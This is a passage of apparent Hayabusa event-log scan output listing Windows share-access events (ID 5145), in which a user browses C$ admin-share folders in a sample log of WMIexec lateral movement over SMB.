20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig 
| Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr | IP Addr: 10.23.23.9 | LID: 